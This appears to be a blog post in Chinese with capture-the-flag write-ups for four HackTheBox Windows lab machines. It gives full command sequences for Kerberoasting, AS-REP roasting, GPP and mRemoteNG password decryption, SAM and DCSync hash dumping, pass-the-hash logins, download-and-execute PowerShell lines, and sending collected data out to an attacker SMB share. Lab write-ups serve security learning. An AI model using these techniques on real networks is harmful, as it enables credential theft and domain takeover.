xXxYOLOxXx

xXxYOLOxXx

HTB_Windows_Set_1

Posted on Edited on In
  • HTB返场了几台Windows的靶机
  • 确定了暑假的实习
  • 考试周的考试安排得靠后

正巧

Active

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
nmap -sV -sT -Pn 10.10.10.100

Nmap scan report for 10.10.10.100
Host is up (0.59s latency).
Not shown: 982 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 09:21:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

漏洞利用

开了53端口,基本确定是台DC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
enum4linux 10.10.10.100

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

------

 ====================================== 
|    OS information on 10.10.10.100    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.100 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.100 from srvinfo:
	10.10.10.100   Wk Sv PDC Tim NT     Domain Controller
	platform_id     :	500
	os version      :	6.1
	server type     :	0x80102b

------

 ========================================= 
|    Share Enumeration on 10.10.10.100    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	attacker_folder Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk

应该可以匿名登录

1
2
3
4
5
6
7
8
9
10
11
12
smbmap -H 10.10.10.100

	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	attacker_folder                                   	NO ACCESS	
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

下载整个文件夹

1
2
3
4
5
smbclient //10.10.10.100/Replication
mask ""
recurse ON
prompt OFF
mget active.htb

拿到GPP密文密码

1
2
3
4
5
cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

解密得到明文密码

1
2
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

这里本来以为是用evil-winrm或者psexecGetshell的,没想到是smb登入users

1
2
3
4
5
smbclient //10.10.10.100/Users -U active.htb/SVC_TGS%GPPstillStandingStrong2k18
get svc_tgs\desktop\user.txt

cat svc_tgs\\desktop\\user.txt 
86d67d8ba232bb6a254aa4d10159e983

权限提升

Kerberoasting

1
python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile getuserspns.out

(跑的时候出了个时间差过大的错误,头疼)
同步时间

1
ntpdate -u 10.10.10.100

爆破票据

1
2
3
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs getuserspns.out 

Ticketmaster1968 (?)

查看SMB路径权限

1
2
3
4
5
6
7
8
9
10
11
12
smbmap -H 10.10.10.100 -u administrator -p Ticketmaster1968

	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	READ, WRITE	Remote Admin
	attacker_folder                                   	READ, WRITE	
	C$                                                	READ, WRITE	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ, WRITE	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ, WRITE	Logon server share 
	Users

有写权限,直接psexec

1
2
3
4
5
python psexec.py active.htb/administrator@10.10.10.100
Ticketmaster1968

type \users\administrator\desktop\root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

Bastion

端口扫描

1
2
3
4
5
6
7
8
9
10
11
nmap -sV -sT -Pn 10.10.10.134

Nmap scan report for 10.10.10.134
Host is up (0.59s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

漏洞利用

smbmap扫描路径

1
2
3
4
5
6
7
smbmap -H 10.10.10.134 -u test
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Backups                                           	READ, WRITE	
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC

可以看到有两个VHD文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
smbclient //10.10.10.134/backups

dir WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 20:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 20:45:32 2019
  BackupSpecs.xml                    An     1186  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 20:45:32 2019

		7735807 blocks of size 4096. 2757267 blocks available

先挂载SMB服务的文件,再将VHD文件挂载到本地磁盘

1
2
3
4
5
6
mkdir /tmp/vhd
mkdir /tmp/l4mpje-pc
mount -t cifs //10.10.10.134/backups/WindowsImageBackup/L4mpje-PC  /tmp/l4mpje-pc/ -o user=anonymous
modprobe nbd max_part=16
qemu-nbd -r -c /dev/nbd0 "/tmp/l4mpje-pc/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd"
mount -r /dev/nbd0p1 /tmp/vhd

复制SAM文件和SYSTEM文件

1
2
cp /tmp/vhd/Windows/System32/config/SYSTEM /root/
cp /tmp/vhd/Windows/System32/config/SAM /root/

取消挂载

1
2
3
4
umount /tmp/vhd
qemu-nbd -d /dev/nbd0
rmmod nbd
umount /tmp/l4mpje-pc

dump出Hash

1
2
3
4
5
6
7
8
python secretsdump.py local -system /root/SYSTEM -sam /root/SAM

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

解密得到明文

1
2
3
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash

bureaulampje     (?)

SSH登入

1
2
3
4
5
ssh L4mpje@10.10.10.134
bureaulampje

type Desktop\user.txt                                                                            
9bfe57d5c3309db3a151772f9d86c6cd

权限提升

找到mRemoteNG程序的凭证储存

1
2
3
type \Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

还原管理员口令

1
2
3
4
wget https://raw.githubusercontent.com/kmahyyg/mremoteng-decrypt/master/mremoteng_decrypt.py
python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Password: thXLHM96BeKL0ER2

ssh登入

1
2
3
4
5
ssh administrator@10.10.10.134
thXLHM96BeKL0ER2
type \Users\Administrator\Desktop\root.txt                    

958850b91811676ed6620a9c430e65c8

Forest

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nmap -sV -sT -Pn 10.10.10.161

Nmap scan report for 10.10.10.161
Host is up (0.081s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Microsoft DNS
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 14:34:46Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

漏洞利用

还是DC

跑出来域名和一些用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
enum4linux 10.10.10.161

 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)

-----

 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Typically that requires credentials on the domain to authenticate with. There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts.

https://0xdf.gitlab.io/2020/03/21/htb-forest.html#as-rep-roasting

AS-REP Roasting

1
2
3
4
5
python GetNPUsers.py HTB/svc-alfresco -request -no-pass -dc-ip 10.10.10.161
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:74aacc88dcebdc99fbdfad38ea7bfb86$0f390178e508b52f3547f4784f435ca5955e6086b719aab1723ec0d13c900d4b0b7e4a00c10162b5615fb8c93e90f34a1746b5de60400cac0a2eae9ecab1a1d16f1d41958d72811ba73835e3177ea538e77888a207a47537c83644879fa792b5d31b965dd75aef7409dc34ba0b2df67eb987db6779846f330d563277f97e004484f67e7a853beec8e7552b427ac4c43fabd3f523a365f80a43f90f587ee08bbc8d06ad907d9efc5a6541714f92fe3c7626dd539daa45d54a4ef5733579277c65f7d11ca380184131a767428ca62077e4553fd8d86d1e7340da4b41b115357485

爆破口令明文

1
2
3
john --wordlist=/usr/share/wordlists/rockyou.txt hash

s3rvice          ($krb5asrep$23$svc-alfresco@HTB)

evil-winrm登入

1
2
3
4
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
type C:\users\svc-alfresco\desktop\user.txt

e5e4e47ae7022664cda6eb013fb0d9ed

权限提升

下载bloodhound的powershell版本的collector,开启HTTP服务和SMB服务(impacket)

1
2
3
4
wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
python -m http.server 9998&
python smbserver.py Bufferfly . -smb2support -username Buffer -password fly&

靶机上下载bloodhound collector并回传输出文件

1
2
3
4
5
6
7
iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/PowerView.ps1")
iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/SharpHound.ps1")
powershell -exec bypass
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
net use \\10.10.16.11\Bufferfly /u:Buffer fly
copy 20210705223815_BloodHound.zip \\10.10.16.11\Bufferfly\
net use /d \\10.10.16.11\Bufferfly

bloodhound的内容实在是看不懂,看了WP
大概思路是

  1. 用户"svc-alfresco"拥有账户操作权限,可以创建域账户
  2. 用户"svc-alfresco"完全控制"Exchange Windows Permissions"组(GenericAll),可以将"svc-alfresco"加入"Exchange Windows Permissions"组
  3. "Exchange Windows Permissions"组可以修改域用户的ACL(WriteDacl)
  4. 用户"svc-alfresco"利用"Exchange Windows Permissions"组的权限赋予"DCSync"权限
  5. 利用这个域账户进行DCSync攻击

添加域用户

1
net user bufferfly bufferfly /add /domain

执行命令后重新Getshell

1
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco

查看组

1
2
3
4
whoami /groups

HTB\Exchange Windows Permissions           Group            S-1-5-21-3072663084-364016917-1341370565-1121 Mandatory group, Enabled by default, Enabled group
HTB\Exchange Trusted Subsystem             Group            S-1-5-21-3072663084-364016917-1341370565-1119 Mandatory group, Enabled by default, Enabled grou

添加DCSync权限(PowerView.ps1)

1
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity bufferfly -Rights DCSync

DCSync攻击

1
2
3
python secretsdump.py -just-dc "htb/bufferfly:bufferfly@10.10.10.161"

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Hash登入

1
2
3
4
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
type c:\users\administrator\desktop\root.txt

f048153f202bbb2f82622b04d79129cc

貌似svc-alfresco不是域用户,而DCSync的操作需要一个域用户的凭证

Powershell在运行命令时貌似会自动地从ps1文件载入函数,很方便

Heist

端口扫描

1
2
3
4
5
6
7
8
9
10
nmap -sV -sT -Pn 10.10.10.149

Nmap scan report for 10.10.10.149
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

漏洞利用

访问http://10.10.10.149/attachments/config.txt

得到一些账户

1
2
3
rout3r:$uperP@ssword
admin:Q4)sJu\Y8qz*A3?d
secret:stealth1agent

测试hazard的密码(由于未知原因,hydra不能爆破SMB)

1
2
3
4
5
6
7
smbmap -H 10.10.10.149 -u hazard -p stealth1agent
        
  Disk                                                    Permissions Comment
  ----                                                    ----------- -------
  ADMIN$                                              NO ACCESS Remote Admin
  C$                                                  NO ACCESS Default share
  IPC$                                                READ ONLY Remote IPC

枚举域账户信息

1
2
3
4
5
6
7
8
9
10
11
python lookupsid.py hazard:stealth1agent@heist

500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat user

hazard
administrator
admin
rout3r
admin
secret
support
Chase
------
cat pass

$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

爆破winrm服务

1
2
3
crackmapexec winrm 10.10.10.149 -d heist -u user -p pass

WINRM       10.10.10.149    5985   10.10.10.149     [+] heist\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

winrm登入

1
2
3
4
evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"
type c:\users\chase\desktop\user.txt

a127daef77ab6d9d92008653295f59c4

权限提升

查看进程

1
2
3
4
5
6
7
ps

    378      28    25008      62440       1.16   6216   1 firefox
    355      25    16444      38908       0.27   6564   1 firefox
   1050      73   172600     248916      13.88   6732   1 firefox
    347      19     9972      34476       0.23   6844   1 firefox
    401      34    40728     101244       3.31   6956   1 firefox

可以看看firefox进程内存

开启HTTP服务与SMB服务

1
2
python -m http.server 9998&
python smbserver.py Bufferfly . -smb2support -username Buffer -password fly&

上传procdump并回传firefox进程内存

1
2
3
4
5
wget -uri http://10.10.16.14:9998/procdump64.exe -outfile procdump64.exe
./procdump64.exe -accepteula -ma 6216
net use \\10.10.16.14\Bufferfly /u:Buffer fly
copy firefox.exe_210706_221007.dmp \\10.10.16.14\Bufferfly\
net use /d \\10.10.16.14\Bufferfly

查找admin相关信息

1
2
3
grep -a admin firefox.exe_210706_221007.dmp

localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ

wimrm登入

1
2
3
4
evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'
type c:\users\administrator\desktop\root.txt

50dfa3c6bfd20e2e0d071b073d766897

还是没想通为啥hydra爆不了smb,以后有机会再试试

EOF